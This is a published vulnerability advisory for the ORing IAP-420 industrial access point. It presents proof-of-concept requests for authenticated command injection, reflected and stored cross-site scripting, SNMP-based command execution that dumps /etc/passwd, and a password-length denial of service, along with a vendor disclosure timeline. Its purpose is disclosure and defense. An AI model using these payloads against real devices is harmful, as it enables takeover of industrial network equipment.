back to the list
Date
24/05/2024
Impact
High
CVE IDs
CVE-2024-55544
CVE-2024-55545
CVE-2024-55546
CVE-2024-55547
CVE-2024-55548

St. Pölten UAS | Multiple Vulnerabilities in ORing IAP

The Oring IAP-420 is prone to multiple vulnerabilities. This allows an attacker to exploit weaknesses such as authenticated command injection, cross-site scripting, remote command execution and denial of service to gain unauthorized control, compromise user sessions, execute arbitrary commands or disrupt device functionality.

Vendor description

„Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch
cutting-edge products catering to customer needs. ORing’s products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time.“

Source: https://oringnet.com/en/about-us/company-profile

Vulnerable versions

IAP-420 / 2.01e

Vulnerability overview

1) Authenticated Command Injection (CVE-2024-55544)

A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

2) Reflected Cross-Site Scripting (CVE-2024-55545)

A reflected cross-site scripting vulnerability is present on the sub page “even_log.cgi”, which is used to display event logs. It can be exploited in the context of a victim’s session.

3) Stored Cross-Site Scripting (CVE-2024-55546)

A stored cross-site scripting vulnerability has been identified in the firmware of the device. It was identified in the device properties and can be exploited in the context of a victim’s session.

4) Remote Command Execution via SNMP (CVE-2024-55547)
SNMP allows to write the nsExtendObjects. This enables an attacker to execute commands on the operating system of the device.

5) Denial of Service (CVE-2024-55548)
A denial of service (DoS) condition can be reached if a password with more than 16 characters is set in a user account. This is only possible as authenticated user and by disabling the lenght check in the input fields.

Proof of Concept

1) Authenticated Command Injection (CVE-2024-55544)

The following GET request creates a file named “test” in the “/tmp” directory.

POST /cgi-bin/even_log.cgi HTTP/1.1
Host: 10.69.10.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 553
Origin: http://10.69.10.2
Connection: keep-alive
Referer: http://10.69.10.2/cgi-bin/even_log.cgi
Cookie: <auth-cookie>
Upgrade-Insecure-Requests: 1
tf_logserver_ip=10.10.10.0&tf_logserver_port=;touch%20/tmp/test&Submit=Apply&
ret_msg=&lang=en&h_ColdLog=off&h_WarmLog=off&h_AuthLog=off&h_IpLog=off&
h_PwdLog=off&h_RedundantPowerLog=&h_LinkChangedLog=off&
h_SNMPAccessFailedLog=off&h_WlcAssociatedLog=off&h_WlcDisassociatedLog=off&
h_CliAssociatedLog=off&h_CliDisassociatedLog=off&h_CliRoamingLog=off&
h_Power1FaultLog=&h_Power2FaultLog=&h_POEFaultLog=&h_Eth1LinkDownLog=off&
h_Eth2LinkDownLog=off&h_DI1LtoHLog=&h_DI2LtoHLog=&h_DI3LtoHLog=&h_DI4LtoHLog=&
h_DI1HtoLLog=&h_DI2HtoLLog=&h_DI3HtoLLog=&h_DI4HtoLLog=

This way, the file “/tmp/test” gets created on the filesystem.

2) Reflected Cross-Site Scripting (CVE-2024-55545)
The following payload can be used to trigger a Cross-Site Scripting:
"><script >alert(document.cookie)</script >
This has been implemented as HTML file as simple Proof-of-Concept:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>XSS PoC</title>
</head>
<body>
<h1>XSS Proof of Concept</h1>
<form id="xssForm" action="http://10.69.10.2/cgi-bin/even_log.cgi" method="POST">
<input type="hidden" name="tf_logserver_ip" value="&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">
<input type="hidden" name="tf_logserver_port" value="66">
<input type="hidden" name="Submit" value="Apply">
<input type="hidden" name="ret_msg" value="">
<input type="hidden" name="lang" value="en">
<input type="hidden" name="h_ColdLog" value="off">
<input type="hidden" name="h_WarmLog" value="off">
<input type="hidden" name="h_AuthLog" value="off">
<input type="hidden" name="h_IpLog" value="off">
<input type="hidden" name="h_PwdLog" value="off">
<input type="hidden" name="h_LinkChangedLog" value="off">
<input type="hidden" name="h_SNMPAccessFailedLog" value="off">
<input type="hidden" name="h_WlcAssociatedLog" value="off">
<input type="hidden" name="h_WlcDisassociatedLog" value="off">
<input type="hidden" name="h_CliAssociatedLog" value="off">
<input type="hidden" name="h_CliDisassociatedLog" value="off">
<input type="hidden" name="h_CliRoamingLog" value="off">
<input type="hidden" name="h_Eth1LinkDownLog" value="off">
<input type="hidden" name="h_Eth2LinkDownLog" value="off">
</form>
<script>
document.getElementById('xssForm').submit();
</script>
</body>
</html>
3) Stored Cross-Site Scripting (CVE-2024-55546)
Permanent JavaScript code can be stored on the device by abusing certain system settings as shown below:
POST /cgi-bin/basic_sysset.cgi HTTP/1.1
Host: 10.69.10.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://10.69.10.3
Connection: keep-alive
Referer: http://10.69.10.3/cgi-bin/basic_sysset.cgi?lang=en
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
tf_devname=%3Cscript%3E%2F*&tf_devlocation=*%2Falert%281%29%3B%2F*&tf_devdes=*%2F%3C%2Fscript%3E&bt_apply=Apply&lang=en&ret_msg=
Everytime, when the sub page is loaded, the placed JavaScript code is executed.
4) Remote Command Execution via SNMP (CVE-2024-55547)

Setting the SNMP nsExtendObjects can be done with the command “snmpset”:

$ snmpset -m +NET-SNMP-EXTEND-MIB -v2c -c public 10.69.10.3 'nsExtendStatus."evilcommand"' = createAndGo 'nsExtendCommand."evilcommand"' = /bin/cat 'nsExtendArgs."evilcommand"' = '/etc/passwd' 
NET-SNMP-EXTEND-MIB::nsExtendStatus."evilcommand" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."evilcommand" = STRING: /bin/cat
NET-SNMP-EXTEND-MIB::nsExtendArgs."evilcommand" = STRING: /etc/passwd
Executing the placed command “/bin/cat” can be done with “snmpwalk”, as it
invokes the objects which causes an execution:
$ snmpwalk -v2c -c public 10.69.10.3 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."evilcommand" = STRING: /bin/cat
NET-SNMP-EXTEND-MIB::nsExtendArgs."evilcommand" = STRING: /etc/passwd
NET-SNMP-EXTEND-MIB::nsExtendInput."evilcommand" = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."evilcommand" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."evilcommand" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."evilcommand" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."evilcommand" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."evilcommand" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."evilcommand" = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."evilcommand" = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."evilcommand" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."evilcommand" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."evilcommand".1 = STRING: root:k6GmNCQYU9ZQU:0:0:Adminstrator:/:/bin/sh
In this case, the file “/etc/passwd” is printed.
5) Denial of Service (CVE-2024-55548)

Disabling the lenght check in the input field enables to set a password longer than 16 characters. By doing so, the device reaches a DoS state and it’s web interface is not usable anymore.

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

None.

Workaround

Restrict network access to the device. Restrict access to the management interface.

Recommendation

CyberDanube recommends to change the hardware.

Contact Timeline

  • 2024-09-23: Contacting ORing via support@oringnet.com and sending advisory to support.
  • 2024-10-21: Asking for an update; No answer.
  • 2024-10-30: Asking for an update; No answer.
  • 2024-11-11: Asking for an update; No answer.
  • 2024-12-04: Asking for an update; No answer.
  • 2024-12-06: Informing ORing that the publication will be done on 09-12-2024.
  • 2024-12-09: Release of security advisory.

Author(s)

UAS St. Pölten

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.